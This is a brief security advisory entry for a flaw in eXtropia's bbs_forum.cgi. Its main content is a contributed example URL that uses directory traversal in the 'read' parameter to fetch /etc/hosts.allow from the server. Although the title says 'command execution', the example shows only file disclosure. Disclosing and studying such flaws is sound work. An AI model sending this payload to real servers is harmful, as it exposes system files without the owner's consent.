eXtropia bbs_forum.cgi Remote Arbitrary Command Execution Vulnerability

info
discussion
exploit
solution
references

eXtropia bbs_forum.cgi Remote Arbitrary Command Execution Vulnerability

scott <smackenz@brad.ac.uk> provided the following example:

www.web*site.com/cgi-bin/bbs_forum.cgi?forum=<forum_name>&read=../../../../../../etc/hosts.allow

note: The section: <forum_name> must be a valid forum on the webserver.